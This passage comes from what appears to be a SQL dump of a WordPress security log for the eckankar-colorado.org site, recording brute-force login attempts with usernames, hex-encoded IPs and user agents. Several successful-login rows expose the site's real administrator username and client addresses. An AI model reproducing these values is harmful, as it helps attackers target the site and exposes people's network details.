Gecko) Version/12.0.2 Safari/605.1.15'),(19919,132934,1699637245.823903,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19920,132935,1699637247.681734,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19918,132933,1699637244.639752,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19921,132936,1699637250.391919,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19914,132917,1699604201.189368,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFFD18D21A8,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(19924,132939,1699637256.458028,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7BCF2EEC,'python-requests/2.27.1'),(19925,132958,1699647155.023758,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF924678D8,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(19926,132968,1699677243.062576,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFFD18D3863,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(19927,132969,1699679502.549331,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D4F1959,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19929,133004,1699724405.825331,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB9750397,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19930,133005,1699724407.816626,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB9750397,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19931,133008,1699738922.159958,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19932,133009,1699742287.955248,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(19933,133011,1699745742.572018,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0'),(20167,134891,1700374408.951877,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20168,134892,1700374409.290572,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20169,134893,1700374409.626502,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20170,134894,1700374409.978972,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20171,134895,1700374410.320866,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20172,134895,1700374410.323511,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20173,134896,1700374410.655726,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20174,134898,1700375594.449172,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCAA6CE23,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(20175,134899,1700376063.860899,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF334DE61D,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(20176,134900,1700378538.122642,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6883B115,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(20177,134901,1700380980.441594,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA1237CFB,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(20178,134902,1700383058.823294,1,'loginFailInvalidUsername','etiadmin',0,0x00000000000000000000FFFFC3141064,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20179,134903,1700383059.849566,1,'loginFailInvalidUsername','etiadmin',0,0x00000000000000000000FFFFC3141064,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20180,134904,1700383060.912347,1,'loginFailInvalidUsername','etiadmin',0,0x00000000000000000000FFFFC3141064,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20181,134905,1700383061.919158,1,'loginFailInvalidUsername','etiadmin',0,0x00000000000000000000FFFFC3141064,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20035,134627,1700151280.761814,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20036,134628,1700151963.435005,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20037,134629,1700152640.557337,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20038,134629,1700152640.560108,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20039,134630,1700153304.852062,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20040,134631,1700153977.656510,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20041,134631,1700153977.659288,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20042,134632,1700154645.638446,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20043,134633,1700155327.139433,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20044,134635,1700156011.326956,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20045,134635,1700156011.331008,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20046,134636,1700156691.369302,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20047,134637,1700157371.620245,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20048,134638,1700158055.207889,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20049,134638,1700158055.210238,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20050,134640,1700158723.568723,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20051,134641,1700159396.955104,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20052,134642,1700160065.058445,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20053,134643,1700160735.283455,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20054,134644,1700161409.148398,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20055,134645,1700162087.060007,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20056,134646,1700162773.104178,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20057,134647,1700163461.111339,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20058,134648,1700164135.852672,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20059,134649,1700164812.998768,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20060,134650,1700165497.459215,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20061,134651,1700166178.574342,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20062,134652,1700166864.646750,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20063,134655,1700167597.786030,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20064,134663,1700168274.767691,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20065,134664,1700169017.705377,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20066,134667,1700169694.644894,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20067,134674,1700170367.757099,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20068,134675,1700171042.811339,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20069,134681,1700171724.289153,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20070,134683,1700172407.587875,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20071,134686,1700173098.897847,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20072,134687,1700173801.756544,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20073,134688,1700174490.970216,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20138,134851,1700331135.371633,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF45A3BA86,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(20139,134852,1700333572.608956,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF334D4254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(20140,134853,1700335371.708563,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(18275,107950,1691116877.877193,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18274,107949,1691116877.006024,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18273,107948,1691116875.144577,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18272,107947,1691116874.336372,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18271,107946,1691116873.507964,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18270,107945,1691116872.706165,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18269,107894,1691114418.044867,1,'loginFailInvalidUsername','support2',0,0x00000000000000000000FFFF4A71848E,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'),(18268,107893,1691114416.616324,1,'loginFailInvalidUsername','support1',0,0x00000000000000000000FFFFD4E1EEF4,'Mozilla/5.0 (Linux; Android 11; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18267,107892,1691114415.126778,1,'loginFailInvalidUsername','show2',0,0x00000000000000000000FFFF67E477A2,'Mozilla/5.0 (Linux; Android 11; SM-A207M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18266,107891,1691114413.001608,1,'loginFailInvalidUsername','show1',0,0x00000000000000000000FFFF674C9612,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18265,107890,1691114408.323786,1,'loginFailInvalidUsername','webmaster2',0,0x00000000000000000000FFFFBAB364A4,'Mozilla/5.0 (Linux; Android 9; LGL722DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18264,107889,1691114406.445184,1,'loginFailInvalidUsername','webmaster1',0,0x00000000000000000000FFFFD3C5B885,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1'),(18263,107888,1691114403.956447,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF7AA5B5A5,'Mozilla/5.0 (Linux; Android 11; T790W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(20207,134979,1700506057.253019,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF225E65D6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20208,134980,1700506057.504733,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF225E65D6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20209,134981,1700506057.781760,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF225E65D6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20210,134982,1700511651.745156,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(20211,134983,1700514900.353483,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(20212,134984,1700517464.150036,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14DB3EB7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(18397,109410,1691348444.303258,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFF67966E23,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18396,109409,1691348431.137724,1,'loginFailInvalidUsername','mail.eckankar-colorado.org',0,0x00000000000000000000FFFFD9A5459B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18395,109408,1691348413.312211,1,'loginFailInvalidUsername','Mail.eckankar-colorado.org!',0,0x00000000000000000000FFFF675C2BAF,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18394,109407,1691348401.498829,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF67ABBB4F,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18393,109406,1691348382.585600,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFF25F3FB86,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18392,109405,1691348374.491125,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFCBA0BC12,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18391,109404,1691348372.929755,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFA335B4FC,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18390,109403,1691348362.948336,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFC446F9B1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18389,109402,1691348362.586054,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF7DA67C33,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18388,109401,1691348359.694640,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF5E155AEB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18387,109400,1691348330.284965,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF2E79F0DD,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18386,109399,1691348302.181259,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF560B3A73,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18385,109398,1691348286.891383,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFF33FD9EBD,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18384,109397,1691348256.635080,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFF7D127732,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18383,109396,1691348235.593519,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6759438D,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18382,109395,1691348212.927388,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF5FB4E7A5,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18381,109394,1691348191.845307,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFBE6044CA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18380,109393,1691348190.594735,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF9A48A39A,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18379,109392,1691348183.325949,1,'loginFailInvalidUsername','Eckankar-colorado.org',0,0x00000000000000000000FFFF29FAF0F8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18378,109391,1691348160.884528,1,'loginFailInvalidUsername','Password',0,0x00000000000000000000FFFF510A677E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18377,109390,1691348159.747810,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFBB39900B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18349,109358,1691336637.010634,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18348,109356,1691328452.587953,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFF8A614276,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18347,109355,1691328450.525762,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF7AE0FAEE,'Mozilla/5.0 (Linux; Android 10; ASUS_I001D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18346,109354,1691328442.596906,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF5C578E9E,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18345,109353,1691328441.165343,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFFC1CBD1D3,'Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18344,109352,1691328439.675864,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF5D719A41,'Mozilla/5.0 (Linux; Android 12; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18343,109351,1691328436.018712,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF2BE6C3CA,'Mozilla/5.0 (Linux; Android 9; KFONWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/94.4.4 like Chrome/94.0.4606.128 Safari/537.36'),(18342,109050,1691304485.962875,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF5C2B578B,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18341,109049,1691304483.858869,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFFCA3DA7DB,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Snapchat/11.60.0.35 (like Safari/8612.1.27.0.31, panda)'),(18340,109048,1691304481.472609,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFF2E699D54,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/40.2  Mobile/15E148 Safari/605.1.15'),(18339,109047,1691304479.255742,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF5579CC0C,'Mozilla/5.0 (Linux; Android 10; Elite_B55 Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18338,109046,1691304475.920240,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFFC1E486B1,'Mozilla/5.0 (Linux; Android 7.1.1; Z839) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18351,109361,1691339618.778621,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18350,109360,1691339594.607503,1,'loginFailValidUsername','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18606,111255,1691941120.883079,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF81CD66F3,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N981U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18605,111254,1691941118.727940,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFFB7307AF0,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18604,111253,1691941113.897374,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFFD4037AF6,'Mozilla/5.0 (Linux; Android 12; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36 OPR/66.2.3445.62346'),(18603,111252,1691941111.972840,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFF2443842F,'Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U1 Build/M1AJQ; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 Mobile Safari/537.36'),(18602,111251,1691941105.207758,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB1C84156,'Mozilla/5.0 (Linux; Android 11; SM-S326DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18601,111250,1691935994.132812,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF82FF5D82,'Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18600,111249,1691935991.843018,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFB89A0D7A,'Mozilla/5.0 (Linux; Android 11; KB2007 Build/RP1A.201005.001; ) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.101 Mobile Safari/537.36 BingSapphire/22.0.400111302'),(18599,111248,1691935990.361039,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF5F6BAD59,'Mozilla/5.0 (Linux; Android 9; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18598,111247,1691935988.570423,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFACF55FAE,'Mozilla/5.0 (Linux; Android 11; SM-G988B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18597,111246,1691935987.286322,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF330F3092,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/189.0.413529291 Mobile/15E148 